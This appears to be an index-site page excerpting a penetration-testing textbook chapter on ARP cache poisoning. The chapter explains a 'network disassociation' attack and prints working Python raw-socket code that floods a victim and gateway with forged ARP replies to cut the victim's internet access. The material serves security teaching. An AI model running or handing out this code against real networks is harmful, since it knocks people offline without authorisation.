Python Penetration Testing Essentials by Python Penetration Testing Essentials

Python Penetration Testing Essentials by Python Penetration Testing Essentials

Author:Python Penetration Testing Essentials
Language: eng
Format: epub
Publisher: Packt Publishing


Testing the security system using custom packet crafting and injection

So far, you have seen the implementation of ARP spoofing. Now, let's learn about an attack called the network disassociation attack. Its concept is the same as ARP cache poisoning.

Network disassociation

In this attack, the victim will remain connected to the gateway but cannot communicate with the outer network. Put simply, the victim will remain connected to the router but cannot browse the Internet. The principle of this attack is the same as ARP cache poisoning. The attack will send the ARP reply packet to the victim and that packet will change the MAC address of the gateway in the ARP cache of the victim with another MAC. The same thing is done in the gateway.

The code is the same as that of ARP spoofing, except for some changes, which are explained as follows:

import socket import struct import binascii s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) s.bind(("eth0",socket.htons(0x0800))) sor = '\x48\x41\x43\x4b\x45\x52' victmac ='\x00\x0C\x29\x2E\x84\x7A' gatemac = '\x00\x50\x56\xC0\x00\x08' code ='\x08\x06' eth1 = victmac+sor+code #for victim eth2 = gatemac+sor+code # for gateway htype = '\x00\x01' protype = '\x08\x00' hsize = '\x06' psize = '\x04' opcode = '\x00\x02' gate_ip = '192.168.0.1' victim_ip = '192.168.0.11' gip = socket.inet_aton ( gate_ip ) vip = socket.inet_aton ( victim_ip ) arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip while 1: s.send(arp_victim) s.send(arp_gateway)



Download



Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.